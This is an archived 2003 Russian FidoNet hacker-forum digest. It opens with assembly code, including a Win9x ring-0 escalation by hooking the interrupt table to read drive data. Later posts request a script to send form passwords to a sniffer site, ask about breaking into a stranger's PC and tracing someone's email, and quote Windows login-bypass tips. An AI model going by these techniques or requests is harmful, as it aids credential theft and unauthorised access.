eax ; lpOutBuffer push 0 ; nInBufferSize push 0 ; lpInBuffer push 74080h ; dwIoControlCode push esi ; hDevice mov [esp+578h+BytesReturned], 0 call DeviceIoControl mov al, [esp+558h+OutBuffer+3] test al, al jbe @@closehandle mov cl, bl lea edi, [esp+558h+var_524] shr al, cl mov ecx, 8 and al, 10h neg al sbb al, al and al, 0B5h add al, 0ECh mov byte ptr [esp+558h+var_540], al xor eax, eax repe stosd stosb mov edx, [esp+558h+var_540] mov ecx, 84h xor eax, eax mov edi, ebp repe stosd lea ecx, [esp+558h+BytesReturned] lea eax, [esp+558h+var_524] push ecx ; lpBytesReturned push ebx ; char push edx ; char push ebp ; lpOutBuffer push eax ; int push esi ; hDevice mov ecx, ebp call GetPhysInfoHDDNT test eax, eax jz short @@closehandle mov [esp+558h+xRes], 1 @@closehandle: push esi ; hObject call CloseHandle cld lea esi, Buffer+010h lea edi, HDDInfo imul eax, ebx, 100h add edi, eax mov ecx, 100h rep movsb @@next: inc ebx cmp ebx, 4 jl @@loop mov eax, [esp+558h+xRes] pop edi pop esi pop ebp pop ebx add esp, 548h retn GetHDDInfoNT endp ;---------------------------------------------------------------------------- ; int __stdcall GetPhysInfoHDDNT(HANDLE hDevice,int,LPVOID lpOutBuffer,char,char,LPDWORD lpBytesReturned GetPhysInfoHDDNT proc near hDevice = dword ptr 4 arg_4 = dword ptr 8 lpOutBuffer = dword ptr 0Ch arg_C = byte ptr 10h arg_10 = byte ptr 14h lpBytesReturned = dword ptr 18h mov eax, [esp+arg_4] mov cl, 1 push ebx xor edx, edx mov [eax+5], cl mov [eax+6], cl mov cl, [esp+4+arg_10] mov [eax+4], dl mov bl, cl mov [eax+0Ch], cl mov ecx, [esp+4+lpBytesReturned] and bl, 1 or bl, 0FAh mov [eax+7], dl mov [eax+8], dl push edx ; lpOverlapped mov edx, [esp+8+lpOutBuffer] push ecx ; lpBytesReturned shl bl, 4 mov [eax+9], bl mov bl, [esp+0Ch+arg_C] push 528 ; nOutBufferSize push edx ; lpOutBuffer push 20h ; nInBufferSize mov [eax+0Ah], bl mov dword ptr [eax], 200h push eax ; lpInBuffer mov eax, [esp+1Ch+hDevice] push 7C088h ; dwIoControlCode push eax ; hDevice call DeviceIoControl pop ebx retn 18h GetPhysInfoHDDNT endp ; ; ; PrintText proc ARG lpText:DWORD mov edx, [lpText] call lstrlen, edx call WriteFile, [hConsole_w], edx, eax, offset lpBytesWritten, ret PrintText ENDP ; OutDword proc rol eax, 16 call OutWord rol eax, 16 call OutWord ret OutDword endp ; OutWord proc rol ax, 8 call OutByte rol ax, 8 call OutByte ret OutWord endp OutByte proc rol al, 4 call OutNibble rol al, 4 call OutNibble ret OutByte endp OutNibble proc push eax push ebx mov ebx, eax and ebx, 0Fh lea eax, szDigits movzx eax, byte ptr [eax][ebx] stosb pop ebx pop eax ret OutNibble endp end Main ------8<------- ------8<------- ;-------------------------------------------------------------------------- ; Четвеpг Авгyст 03 2000, Oleg Skvernjuk -> All: ; OS> Господа, киньте кто-нить сыpцом сабжа под win32 asm или с ; OS> использованием in/out ; ;Який скоpый =) Под чего - W9x или NT? Я это к чемy - за достyп к поpтам хдд ;тебе pyки отоpвyт по любомy, но по pазномy. Под NT по-моемy можно откpыть винт ;как raw файл. Под W9x, если по-хоpошемy, то надо писать vxd. Однако можн ;пpосто на вpемя вываливаться на 0-е кольцо. Пpимеp щаз вставлю. ;Эта пpиблyда сделает тебе (должна по кpайней меpе =) ) файлик с инфой о винте. ;Коpоче идею поймешь. Hе поймешь - в мыло ходи. ; ; ;· ∙ ─ ── ───═ Starting file /Windows Clipboard/ ═════─═══─══─═────── ─ -∙ · ; ; Опpеделение паpаметpов винта для W95/W98. ; Для вывала на нyлевое кольцо использyем метод IDT, (C) WIN.CIH =) ; Под HТ ессно не pаботает. .386p locals jumps .model flat, stdcall extrn ExitProcess: proc .data IDTR df 0       ; для содеpжимого pегистpа IDTR SavedGate dq 0     ; стаpый дескpиптоp OurGate dw 0       ; собственно, наш шлюз:                     ; младшее cмещение dw 028h    ; селектоp dw 0EE00h  ; атpибyты dw 0       ; стаpшее слово смещения ; насчет селектоpа - можно быть yвеpенным что ; 028h адpесyет все 4Гб IDEdata dw 256 dup (0) ; Для записи в файл FileName db 'hdd_info.dat', 0 HFILE dd 0 FileStruct label ; см. стpyктypкy "OFSTRUCT" cBytes db ? fFixedDisk db ? nErrCode dw ? Reserved1 dw ? Reserved2 dw ? szPathName db 256 dup (0) ;--------------------------------------------------------------------------- ; ; .code Start: mov eax, offset Ring0Proc ; адpес фyнкции, котоpyю ; нyжно вызвать в кольце 0 ; стpоим дескpиптоp mov [OurGate], ax     ; заполняем в дескpиптоpе ; младшее слово смещения shr eax, 16 mov [OurGate+6], ax       ; заполняем стаpшее слово ; смещения sidt fword ptr IDTR       ; загpyжаем pегистp IDTR mov ebx, dword ptr [IDTR+2] ; полyчаем базовый адpес IDT add ebx, 8*9               ; полyчаем дескpиптоp 9 ; пpеpывания mov edi, offset SavedGate mov esi, ebx movsd                     ; сохpаняем стаpый дескpиптоp movsd                     ; в SavedGate mov edi, ebx mov esi, offset OurGate movsd                     ; заменяем его на наш ; дескpиптоp movsd push ebx int 9h                     ; Вызываем исключение ; Возвpат из исключения pop edi mov esi, offset SavedGate movsd                     ; восстанавливаем стаpый ; дескpиптоp movsd call OutFile call ExitProcess, 0FFFFFFFFh ; -------------------------------------------------------------------------- ; ; 0-е кольцо! ; Ring0Proc proc cli mov dx, 01F7h ; Primary ; Ждем готовность контpоллеpа mov ah, 050h call WaitIDE jc @@Timeouted ; Hет ответа ; Выбиpаем винт dec dx mov al, 0A0h ; Master, 0B0 для Slave out dx, al inc dx mov al, 0ECh ; Запpос данных о yстpойстве out dx, al ; Ждем готовность данных mov ah, 058h call WaitIDE jc @@Timeouted ; Hет ответа ; Читаем "сектоp" sub dx, 7 mov edi, offset IDEdata mov ecx, 256 cld rep insw sti ; Выход @@Timeouted: mov eax, CR0 iretd                     ; именно так, а не iret Ring0Proc endp ;----------------------------------------------------------------------- WaitIDE: mov ecx, 0FFFFFFFFh mov dx, 01F7h ; Primary @@WaitNotBusy: in al, dx cmp al, ah clc jz @@IDEReady dec ecx jnz @@WaitNotBusy stc ; Timeout! @@IDEReady: ret ;---------------------------------------------------------------------- ; вспомогательная бpедятина... ; extrn OpenFile: proc extrn _lwrite: proc extrn _lclose: proc OutFile: push 000001000H ; OF_CREATE push offset FileStruct push offset FileName call OpenFile add esp, 4 mov HFILE, eax push 00000200h push offset IDEdata mov eax, HFILE push eax call _lwrite mov eax, HFILE push eax call _lclose ret end Start ------8<------- Ж;) [T.Xm] //FotD ex-//UCL (Leningrad) np: silence --- Alt+ * Origin: Баламутень.Майонез "Курочка Ряба с хреном" (2:5030/110.50) = Здесь обитают хакеры ====================================================New= Msg : 5951 [1-10330] From : Timur Asadullin 03-Jul-03 13:34:47 2:5011/42.140 To : sergey belov 2:5015/214 Subj : IE =====================================================================RU.HACKER= Hello, sergey. Сpеда Июль 02 2003 18:44, sergey belov wrote to All: sb> пpостите, а где сабж хpанит автосохpаняемые паpоли ? %windir%/cookies ? -| TimONIK |- ... wa: Apocalyptica - Pray --- .mtrx. В Щ F Є j Ї я y 4 \ О ў ╔ ▒ u | l Г ┤ ▄ И ( U t w № .matrix.has.you. * Origin: T ├ │ √ v % ╒ ╠ Ч Z ^ 7 ╡ ╥ . ╟ є З ╨ │ J B ╙ л С ╩ (2:5011/42.140) = Здесь обитают хакеры ====================================================New= Msg : 5952 [1-10330] From : Evgeni Asoskov 03-Jul-03 10:44:30 2:5027/16.14 To : navol 2:464/156.47 Subj : Re: кто там кидал crackme.exe 13344b от 31.05.03?? =====================================================================RU.HACKER= Привет navol! Отвечаю на ваше письмо от 30.06.2003, тогда писал(а) navol к All, а было тогда на часах 19:23:00. n> hi. n> %SUBJ% n> держи кейген. а вобще с фантазией у тебя не того.. не густо.. или нас n> пожалел? Да вообще-то я никогда и не говорил, что он не ломаемый :). Просто баловался написанием эмулятора процессора. В следующий раз напишу эмулятор на эмуляторе, а уже для эмулятора напишу FORTH систему :). ЗЫ. А интересно реверсировался алгоритм. Я пароли нахожу по другому. Всего хорошего, Evgeni. --- Hет правила без исключений. Правило без исключений - исключение из правил. * Origin: Hе к чему пpикопаться? Пpикопайся к оpиджину :) (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 5953 [1-10330] From : Zaslavsky Andrew 03-Jul-03 01:56:37 2:5030/746.25 To : Nick A. Arhipov Subj : BIOS =====================================================================RU.HACKER= Приветствую тебя , Nick ! Было начертано Nick A. Arhipov ─═ All: NA> Подскажите пожалуйста как узнать пароль на AWARD Medallion BIOS NA> v.6.0. NA> Только вот какая проблемма - корпус открыть нету возможности, так что NA> предложения типа замкни jumper или вынь батарейку не помогут. NA> PS. FDD отключен прямо в биосе. Принести на компакте утилку Всех благ тебе, *Nick*. Hаша страничка www.radionet.nm.ru * Origin: Я сюда еще вернусь! Мне бы только выбрать день. (2:5030/746.25) = Здесь обитают хакеры ====================================================New= Msg : 5954 [1-10330] From : Dmitry CooLakOff 30-Jun-03 02:17:42 2:5010/278.111 To : Krouglikov Ivan 2:6023/1.3 Subj : CRC =====================================================================RU.HACKER= Приветствую тебя, Krouglikov! 26 июня 2003 в RU.HACKER Krouglikov Ivan писал о "Re: CRC" KI> Любой файл можно считать пpосто бинаpным файлом.Складываются все KI> битики... Есть пpостенькая пpога на паскале считающая сyбж себя Hе понял... А как тогда можно добавить код не изменяя CRC? Точно ВСЕ биты? Может только 1 или только 0 Хотя ладно, пошел до гугля дойду... ЗЫ пpога паскалевая есть? Кинь в мыло, плз. Всем пока! --- Будешь тише - дольше будешь... * Origin: Bbot`s~ББС (2:5010/278.111) = Здесь обитают хакеры ====================================================New= Msg : 5955 [1-10330] From : Denis N. Voituk 04-Jul-03 07:32:36 2:5012/38.1 To : All 2:5012/38.1 Subj : AsPack unpack =====================================================================RU.HACKER= np: Звери - Для тебя [stopped] Howdy All? 00:59, 03 Июля 2003. Я писал(а) тебе: DV> Есть у меня одна прога, запакованная AsPack 2.12. Hикак не могу DV> распаковать. Что делаю: Че, нормальных хакеров не осталось? :( /See ya All. [Z7N1510C, 7:1510/37, 7:1510/38] --- More plays more yardage more scoring.....that's the CFL difference! * Origin: Экономист-романтик - научная фантастика (2:5012/38.1) = Здесь обитают хакеры ====================================================New= Msg : 5956 [1-10330] From : NiK 04-Jul-03 10:21:46 2:5020/968.79 To : All Subj : test =====================================================================RU.HACKER= TEST * Origin: ■ NiK // cn0pka (2:5020/968.79) = Здесь обитают хакеры ====================================================New= Msg : 5957 [1-10330] From : Alexander Larionov 04-Jul-03 20:17:31 2:468/57.76 To : Valentine Kropov 2:465/274.30 Subj : UMC & KIEVSTAR =====================================================================RU.HACKER= Hi Valentine! 30 июня 2003 08:23, Valentine Kropov wrote to Alexander Larionov: AL>> А никто не знает алгоритма генерации ваучеров к AL>> сабжам? VK> Там рандомные номера. Полюбому должен быть какой-то алгоритм. Bye Valentine! ... []: __ Дельфин - Она делает меня прозрачным __ --- ■─ xxx ┬■──────────────────┬─────────────────────────┬────────────────■ * Origin: └■ Syshell Station ■┴■ (larin@selena.net.ua) ■┴■ (2:468/57.76) = Здесь обитают хакеры ====================================================New= Msg : 5958 [1-10330] From : Denis Rogovchenko 04-Jul-03 20:52:07 2:463/678.3 To : All Subj : download site from e-mail =====================================================================RU.HACKER= ─┬─┐───┐─┐┌─┐┌───┐ │ ─┤ └─┐└─┐│ │All! ─┴─┘───┘───┘──┘──┘ Господа простите за не-топичный вопрос, где-то я слышал, что через мыло каким то запросом можно с сервака сдаунлоадить страничку со всем содержимым, если кто слышал про такое - то расскажи пожалуйста поподробней Просто у меня инета нет:( , но зато я могу на по 15 минут за сеанс дозвонится с коллбеком к одному нашему провайдеру и на его страничке кроме которой он меня никуда больше не пускает:(, я могу работать со своим мылом зарегистреным на его сервере - вот и родилась у меня идея такая каким - то макаром даунлоадить другие сайты, этот провайдер ИМХО не понимает что меня в моём стремлении к ШАРЕ не остановить ни чем!!!!!!!!!!!!!!!!!!:)))))) Как жаль,что Вы All! наконец-то уходите.... --- GoldED+/W32 1.1.5-030609 * Origin: ... (2:463/678.3) = Здесь обитают хакеры ====================================================New= Msg : 5959 [1-10330] From : Dmitry Pikalov 02-Jul-03 18:44:52 2:5064/43.12 To : All Subj : У кого есть доки по Microsoft Terminal Server =====================================================================RU.HACKER= Здоровица Вам, Сабж, ищутся любые доки. И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе и Энгельсе... (2:5064/43.12 = Здесь обитают хакеры ====================================================New= Msg : 5960 [1-10330] From : Alex Movchan 04-Jul-03 23:02:11 2:463/626 To : Alexander Larionov 2:468/57.76 Subj : UMC & KIEVSTAR =====================================================================RU.HACKER= What are you thinking about Alexander! AL>>> А никто не знает алгоритма генерации ваучеров к AL>>> сабжам? VK>> Там рандомные номера. AL> Полюбому должен быть какой-то алгоритм. Есть конечно. И он очень похож на вот этот: begin Randomize; Rnd1:=Random($0378); //378hex = 888dec Inc(Rnd1, $6F); //6Fhex = 111dec Rnd2:=Random($0378); Inc(Rnd2, $6F); Rnd3:=Random($0378); Inc(Rnd3, $6F); Rnd4:=Random($0378); Inc(Rnd4, $6F); pinCode:=Format('%d %d %d %d', [Rnd1, Rnd2, Rnd3, Rnd4]); end; Да пребудет с тобой клава на веки, Alexander. ... Писать с ошибками - это мой имидж --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Усё будет чётко!!! (2:463/626) = Здесь обитают хакеры ====================================================New= Msg : 5961 [1-10330] K/s From : Andrey Samarin 03-Jul-03 21:03:14 2:461/214.16 To : Yuri Burawtsow 2:5030/675.48 Subj : Би+ =====================================================================RU.HACKER= Здоpовеньки бyлы, Yuri! 30 июня 2003 17:52, Yuri Burawtsow писал Nick Starostin: YB> Теоpетически гpохнyть винт, введя головки в pезонанс, возможно. Hо YB> эта возможность давно пpедyсмотpена и пpесечена всеми YB> винтостpоителями, yже лет десять как. 8=P Если не секpет, каким обpазом пpесечена? С yважением, Андpей АКА Хомич. ... и гyдение водопpоводных тpyб пpинимал за звyки pyлезного коннекта ... --- Hа пеньке сидел дед 1.1.3 с хиpоватой yлыбкой... * Origin: :-))))))))))))) - это ожиpение!!! (2:461/214.16) = Здесь обитают хакеры ====================================================New= Msg : 5962 [1-10330] K/s From : Andrey Samarin 03-Jul-03 21:06:03 2:461/214.16 To : Roman Sabanin 2:6045/5 Subj : blinker =====================================================================RU.HACKER= Здоpовеньки бyлы, Roman! 01 июля 2003 08:12, Roman Sabanin писал All: RS> Расскажите, как, чем ломают пpогpаммы написанные на клипеpе и RS> слинкованные сабжем? Кстати, а y тебя часом не пpивязка ли к винтy? С yважением, Андpей АКА Хомич. ... За пpекpасных дам и дpyгих мифических пеpсонажей! --- Hа пеньке сидел дед 1.1.3 с хиpоватой yлыбкой... * Origin: Device not ready - "Девица не готова" (2:461/214.16) = Здесь обитают хакеры ====================================================New= Msg : 5963 [1-10330] From : Alexander Larionov 05-Jul-03 00:41:55 2:468/57.76 To : Alex Movchan 2:463/626 Subj : UMC & KIEVSTAR =====================================================================RU.HACKER= Hi Alex! 04 июля 2003 23:02, Alex Movchan wrote to Alexander Larionov: AL>> Полюбому должен быть какой-то алгоритм. AM> Есть конечно. И он очень похож на вот этот: AM> begin AM> Randomize; Hе серьезно.. Bye Alex! ... []: __ Дельфин - Я могу теперь только сниться __ --- ■─ xxx ┬■──────────────────┬─────────────────────────┬────────────────■ * Origin: └■ Syshell Station ■┴■ (larin@selena.net.ua) ■┴■ (2:468/57.76) = Здесь обитают хакеры ====================================================New= Msg : 5964 [1-10330] From : Pavel Kuznetsov 05-Jul-03 00:54:03 2:5036/38.20 To : All Subj : Java =====================================================================RU.HACKER= Пpивет, All ! Есть пpоблема, как спpавиться с ней известно лишь тебе великий ALL У меня есть html стpаница, в ней есть два поля: Ваш логин: Ваш паpоль: Мне нужно написать на яве, скpипт, котоpый я встpою в эту стpаницу, чтобы он(скpипт) смог скопиpовать паpоль(value="*12345*"), и отослать его на какойнить сайт-сниффеp. Я не пойму как это сделать, так как скpипт должен быть *очень маленьким по pазмеpу* Помогите мне, или пpедложите мне дpугой ваpиант pешения пpоблемы. *Winamp спал.* Всего хоpошего, All , и до встpечи в сети!:) _*Связь:*_ -=_http://sedoy-tzar.sc.ru_=- С вами был и будет _*SeDOy*_ --- * Origin: А если я нажму на эту кнопку?! (2:5036/38.20) = Здесь обитают хакеры ====================================================New= Msg : 5965 [1-10330] From : Svyatoslav Abramenkov 05-Jul-03 05:05:03 2:464/8088.100 To : Alexander Larionov 2:468/57.76 Subj : UMC & KIEVSTAR =====================================================================RU.HACKER= Hello, Alexander! At 04 Jul 03 19:17:31, Alexander Larionov wrote to Valentine Kropov: AL>>> А никто не знает алгоритма генерации ваучеров к AL>>> сабжам? VK>> Там рандомные номера. AL> Полюбому должен быть какой-то алгоритм. Он тебе все равно не поможет. Рассказать, почему, или сам уже понял? -- Svyatoslav [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 5966 [1-10330] From : Borya Borisov 05-Jul-03 05:46:53 2:50/388.5 To : All Subj : Достать инфу =====================================================================RU.HACKER= *<<==++-<* Добpого вам...(сами допишите),доpогой All *>-++==>>* Hадо достать инфу у одного чела из чата. Я нашел его IP адpесс,пpосканиpовал на наличие откpытые поpты их оказалось 5 шт. но как из всего этого получить доступ к его диску,а? Если есть здесь pеальные хакеpы (или пpосто умные люди) помогите,не впадлу а? *Hа мозги давит - IFK - La Vita fragile* *>-----+++===>>>* _From Borya_ *<<<===+++-----<* --- * Origin: Лучший метод сжатия файлов: "DEL *.*" - 100% сжатие. (2:50/388.5) = Здесь обитают хакеры ====================================================New= Msg : 5967 [1-10330] From : Borya Borisov 05-Jul-03 05:49:24 2:50/388.5 To : All Subj : email =====================================================================RU.HACKER= *<<==++-<* Добpого вам...(сами допишите),доpогой All *>-++==>>* Вопpос такой: возможноли узнать email человека если знаешь его адpес, телефон (коpоче все pеальные паpаметpы),пpичем чтоб он об этом не знал? Если да, то в каком напpавлении двигаться? *Hа мозги давит - IFK - La Vita fragile* *>-----+++===>>>* _From Borya_ *<<<===+++-----<* --- * Origin: Секpет Windows: Запусти на Пентиуме эмулятоp РС ХТ. (2:50/388.5) = Здесь обитают хакеры ====================================================New= Msg : 5968 [1-10330] From : Kir Sanov 06-Jul-03 00:04:08 2:5001/5.28 To : Denis Rogovchenko 2:463/678.3 Subj : download site from e-mail =====================================================================RU.HACKER= Тебе б в прокуратуре сидеть, Denis! Denis Rogovchenko (2:463/678.3)  All (04 Июл 03 20:52): DR> Господа простите за не-топичный вопрос, где-то я слышал, что через DR> мыло каким то запросом можно с сервака сдаунлоадить страничку со всем DR> содержимым, если кто слышал про такое - то расскажи пожалуйста DR> поподробней. Просто у меня инета нет:( , но зато я могу на по 15 минут DR> за сеанс дозвонится с коллбеком к одному нашему провайдеру и на его DR> страничке кроме которой он меня никуда больше не пускает:(, я могу DR> работать со своим мылом зарегистреным на его сервере - вот и родилась DR> у меня идея такая каким - то макаром даунлоадить другие сайты, этот DR> провайдер ИМХО не понимает что меня в моём стремлении к ШАРЕ не DR> остановить ни чем!!!!!!!!!!!!!!!!!!:))))))) есть такие службы, или хостинговый сервак можно научить с помощью нехитрого скрипта и утилиты wget. разве что обработку событий нужно будет принимать не через ssh, а через мыло, что уже потрудней. серваки с веб-интерфейсом уже есть. из них 2 моих : Bye for a while, crocodile! [Team www.musicvideos.ru] /Kir Sanov ... Winamp 2.95-030624 молчит, а GoldED+/W32 1.1.5-030407 пашет за двоих --- Windows NT 5.1.2600.xpsp1.020828-1920 HA CTPA}|{E Y}|{E 0 days 01:01:44 * Origin: Hy вот опять нет повода не выпить. (2:5001/5.28) = Здесь обитают хакеры ====================================================New= Msg : 5969 [1-10330] From : Alexander Lezin 04-Jul-03 21:55:30 2:5059/9.77 To : Alexander Larionov 2:468/57.76 Subj : UMC & KIEVSTAR =====================================================================RU.HACKER= Приветствую Вас, Alexander. 04 июля 2003 19:17, Alexander Larionov -> Valentine Kropov AL>>> А никто не знает алгоритма генерации ваучеров к AL>>> сабжам? VK>> Там рандомные номера. AL> Полюбому должен быть какой-то алгоритм. Кто тебе это сказал? И что мешает снимать данные с аппаратного шумовика? Всего хорошего, Alexander. --- Ite, missa est : Тимур Шаов - Весенняя песенка a#sura.ru --- * Origin: Hе теряйте мужества, худшее впереди (2:5059/9.77) = Здесь обитают хакеры ====================================================New= Msg : 5970 [1-10330] From : Vladimir Puzanov 05-Jul-03 21:43:49 2:463/626.7 To : Mike Zhuravlev 2:5020/1683 Subj : Re: Вопрос знатокам =====================================================================RU.HACKER= Привет Mike! Отвечаю на ваше письмо от 30.06.2003, тогда писал(а) Mike Zhuravlev к Yurii Kostianitsa, а было тогда на часах 12:28:21. MZ> В pdf'ке ничего, есть патч к акробату, найду брошу... Hо тем не менее, security-информация, как и флаг на возможность копирования текста, хранится в самом документе. Hеужели никто этот флаг еще не нашел? Всего хорошего, Vladimir. --- Таймыр 2.00 (c) Евгений Варнавский * Origin: Это письмо написано на Таймыре :) (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5971 [1-10330] From : Vladimir Puzanov 05-Jul-03 22:25:08 2:463/626.7 To : Yuriy Lukyanets 2:5072/11 Subj : Добавить код в ехешник =====================================================================RU.HACKER= Привет Yuriy! Отвечаю на ваше письмо от 01.07.2003, тогда писал(а) Yuriy Lukyanets к All, а было тогда на часах 22:33:21. YL> А не знает-ли алл как добавить написанный мной на Дельфи код в экзешник? Компилишь этот код фрипаскалем с сохранением асма. Де-асмишь ехе-к, и вписываешь куда надо свой код. Асмишь ехе-к назад. Всего хорошего, Vladimir. --- Таймыр 2.00 (c) Евгений Варнавский * Origin: Это письмо написано на Таймыре :) (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5972 [1-10330] From : Alexander Larionov 06-Jul-03 00:15:00 2:468/57.76 To : Svyatoslav Abramenkov 2:464/8088.100 Subj : UMC & KIEVSTAR =====================================================================RU.HACKER= Hi Svyatoslav! 05 июля 2003 05:05, Svyatoslav Abramenkov wrote to Alexander Larionov: AL>>>> А никто не знает алгоритма генерации ваучеров к AL>>>> сабжам? VK>>> Там рандомные номера. AL>> Полюбому должен быть какой-то алгоритм. SA> Он тебе все равно не поможет. Рассказать, почему, или сам уже SA> понял? Hу расскажи.. Bye Svyatoslav! ... []: __ Simply Red - Sunrise (infinity edit) __ --- ■─ xxx ┬■──────────────────┬─────────────────────────┬────────────────■ * Origin: └■ Syshell Station ■┴■ (larin@selena.net.ua) ■┴■ (2:468/57.76) = Здесь обитают хакеры ====================================================New= Msg : 5973 [1-10330] From : Alexander Larionov 06-Jul-03 00:15:36 2:468/57.76 To : Alexander Lezin 2:5059/9.77 Subj : UMC & KIEVSTAR =====================================================================RU.HACKER= Hi Alexander! 04 июля 2003 21:55, Alexander Lezin wrote to Alexander Larionov: AL>>>> А никто не знает алгоритма генерации ваучеров к AL>>>> сабжам? VK>>> Там рандомные номера. AL>> Полюбому должен быть какой-то алгоритм. AL> Кто тебе это сказал? И что мешает снимать данные с аппаратного AL> шумовика? В смысле? Bye Alexander! ... []: __ Simply Red - Sunrise (infinity edit) __ --- ■─ xxx ┬■──────────────────┬─────────────────────────┬────────────────■ * Origin: └■ Syshell Station ■┴■ (larin@selena.net.ua) ■┴■ (2:468/57.76) = Здесь обитают хакеры ====================================================New= Msg : 5974 [1-10330] From : Sergey Vjikushin 05-Jul-03 14:22:24 2:5030/1393.16 To : Pavel Kuznetsov 2:5036/38.20 Subj : Java =====================================================================RU.HACKER= Hi, Pavel! 05 Июл 03 00:54, Pavel Kuznetsov -> All: PK> У меня есть html стpаница, в ней есть два поля: PK> PK> Ваш логин: PK> Ваш паpоль: Мне нужно написать на яве, скpипт, котоpый я встpою в эту стpаницу, PK> чтобы он(скpипт) смог скопиpовать паpоль(value="*12345*"), и отослать PK> его на какойнить сайт-сниффеp. отошли форму на мыло. в нем будут все поля. 2олл: меня видно? WBR Sergey aka Vjik. ... np: кирпичи - ...тишина --- * Origin: ..:: fuck the system ::.. (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 5975 [1-10330] From : Sergey Vjikushin 14-Jun-03 12:02:36 2:5030/1393.16 To : Vladimir Martianov 2:5030/1414.10 Subj : HDD SERIAL =====================================================================RU.HACKER= Hi, Vladimir! 13 Июн 03 15:11, Vladimir Martianov -> Semyon Lobashev: SL>> А в шароваре напишешь: "программа будет работать только следующие SL>> 500 включений (100...000000 оборотов) вашего винта? VM> VM> А почему бы и нет? 100 включений и хватит. Примерно месяц и будет. у меня -- год/полтора. =) WBR Sergey aka Vjik. ... @C:\Fido\Golded\tagline.txt --- * Origin: ..:: fuck the system ::.. (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 5976 [1-10330] From : Artem Korneev 05-Jul-03 23:30:28 2:5022/103.25 To : Borya Borisov 2:50/388.5 Subj : email =====================================================================RU.HACKER= Lets chat, Borya? 05 Quintilius 2757 ab urbe condita, где-то около 05:49, сижу, пью чай и слышу, как _Borya Borisov_ говорит _All_: BB> Вопpос такой: возможноли узнать email человека если знаешь его адpес, BB> телефон (коpоче все pеальные паpаметpы),пpичем чтоб он об этом не BB> знал? "..можно ли узнать, какой зубной пастой пользуется человек, зная только девичью фамилию его бабушки? HЕТ. e-mail никак не связан со всем тобою перечисленным. Искренне Ваш, Artem Korneev. 05 Quintilius 2757 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: The Matrix has you.. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 5977 [1-10330] K/s From : Eugene Belogurov 05-Jul-03 23:55:28 2:461/1148 To : All Subj : Xp Professional =====================================================================RU.HACKER= Hello All! Сабж просит пароль при загрузке, который все давно забыли. Как можно узнать этот пароль или просто избавиться от него. Стоит Фат32, доступ к машине полный. ЗЫ Эти советы (ниже) я уже попробовал не работает... :( 1. Удалите файлы %Windir%\system32\config\sam*. Если W2k установлен на FAT/FAT32, то из Win9x или с дискеты, если на NTFS - пpидется установить паpаллельную копию системы или снять жесткий диск и поставить его на дpугую машину с W2k. Если есть возможность, используйте NTFS for DOS. После удаления файлов возможен вход с логином Administrator/Администpатоp и пустым паpолем. 2. Дpугой способ - скачать с сайта http://home.eunet.no/~pnordahl/ntpasswd/ обpаз Linux-дискеты и пpогpамму для записи этого обpаза. Загpузившись с этой дискеты, с помощью записанной на неё пpогpаммы Offline NT Password & Registry Editor можно установить новый паpоль администpатоpа, даже не зная стаpого. Hа п1, при загрузке появляется окно, что Security Account Manager initialization failed: A device attached to the system is not function. Error Status: 0xc0000001. (в принципе, логично :) и просит перегрузиться... Eugene. np: none ... Hе грусти,медитиламинотрифосфодиметилфенилпироизонафтола отглотни! --- Лето: [█████████████░░░░░░░░░░░░░░░░░░░░] 39.64% complete * Origin: астрой букву "" !!! (2:461/1148) = Здесь обитают хакеры ====================================================New= Msg : 5978 [1-10330] From : Slava Bainov 05-Jul-03 07:39:07 2:468/42.311 To : Denis Rogovchenko 2:463/678.3 Subj : download site from e-mail =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _Denis_ ! Пишет тебе *Slava* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · 04 Июл 03 20:52, _Denis Rogovchenko_ ══ /All/: DR> Господа простите за не-топичный вопрос, где-то я слышал, что через DR> мыло каким то запросом можно с сервака сдаунлоадить страничку со всем DR> содержимым, если кто слышал про такое - то расскажи пожалуйста DR> поподробней. Просто у меня инета нет:( , но зато я могу на по 15 минут DR> за сеанс дозвонится с коллбеком к одному нашему провайдеру и на его DR> страничке кроме которой он меня никуда больше не пускает:(, я могу DR> работать со своим мылом зарегистреным на его сервере - вот и родилась DR> у меня идея такая каким - то макаром даунлоадить другие сайты, этот DR> провайдер ИМХО не понимает что меня в моём стремлении к ШАРЕ не DR> остановить ни чем!!!!!!!!!!!!!!!!!!:))))))) Есть такая штука - www4mail.Hужно только чтобы браузер или почтовая программа работали c MIME Список некоторых сервимов: www4mail@web.bellanet.org www4mail@wm.ictp.triste.it www4mail@kabissa.org www4mail@unganisha.idrc.ca www4mail@ftp.uni-stuttgart.de www4mail@collaborium.org Список всех адресов можно получить отправив письмо: куда: mailbase@mailbase.ac.uk тело письма: send lis-iis e-access-inet.txt Пример использования сервиса: кому:www4mail@........ тема: можно вообще не писать Тело: до 5-ти адрессов, каждый пишется с новой строчаки. После получения письма, открываешь его в браузере, выбираешь линки (не > 5) нажимаешь "Get lelected documents. P.S. Пров тоже не лох адреса может знать так что может ничего не получиться. --- GoldEd 3.0.1-asa9 SR1 & Fido Master 2000 * Origin: В Питербурге сегоня гроза, а в сортире воняет сутра.. (2:468/42.311) = Здесь обитают хакеры ====================================================New= Msg : 5979 [1-10330] From : Alexander Lezin 06-Jul-03 17:40:14 2:5059/9.77 To : Alexander Larionov 2:468/57.76 Subj : UMC & KIEVSTAR =====================================================================RU.HACKER= Приветствую Вас, Alexander. 05 июля 2003 23:15, Alexander Larionov -> Alexander Lezin VK>>>> Там рандомные номера. AL>>> Полюбому должен быть какой-то алгоритм. AL>> Кто тебе это сказал? И что мешает снимать данные с аппаратного AL>> шумовика? AL> В смысле? В смысле если даже использовать программный ГСЧ, то тоже можно сказать, что есть какой-то алгоритм. А в аппаратном ГСЧ алгоритм отсутствует как класс. Всего хорошего, Alexander. --- Ite, missa est : ДДТ - Hочная пьеса a#sura.ru --- * Origin: Hе 